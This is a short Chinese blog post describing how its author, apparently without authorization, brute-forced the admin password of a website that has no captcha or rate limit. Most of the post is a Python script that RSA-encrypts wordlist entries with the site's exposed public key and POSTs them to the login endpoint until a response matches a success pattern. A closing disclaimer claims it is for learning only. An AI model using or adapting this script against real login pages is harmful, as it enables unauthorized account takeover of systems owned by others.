python RSA加密 爆破密码
背景
闲来无事,发现某网站,存在admin账户,无验证码,无登录次数限制。于是想到暴力破解密码试试,但抓包发现密码经过RSA加密,且公钥在前端源码中已经暴露出来。因此写下以下代码来爆破密码。
代码
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
import base64
import requests
import re
import time
def RSA_pwd(passwd, publickey):
passwd=passwd.encode('utf-8')
recipient_key = RSA.import_key(open(publickey).read())
cipher_rsa = PKCS1_OAEP.new(recipient_key)
c = cipher_rsa.encrypt(passwd)
d = base64.b64encode(c).decode()
return d
def request_url(passwd):
url = 'http://XXXXXXXXXXXX'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
'cookie': 'EPXXXXXXALE=zh_CN; JSESSIONID=5XXXXXXXXXXXXXX366E4A'
}
data = {
'ACCOUNT': 'admin',
'PASSWORD': f'{passwd}',
'FM_SYS_ID': 'XXXXXXX',
'FIVXXXE_LOCK' : '',
'serviceUrl' : 'null'
}
re = requests.post(url=url,headers=headers,data=data)
print(re.status_code)
return re.text
pattern = "\":su"
#打开字典
with open('pass_kill.txt') as f:
for i in f:
i=i[:-1]
passwd = RSA_pwd(i,'publickey.bin')
cc = request_url(passwd)
print(cc)
if re.search(pattern, cc, re.I):
print(i)
exit()
# time.sleep(3)
免责声明
本文仅供学习,请勿拿来从事非法活动。一切非法活动皆与本人无关。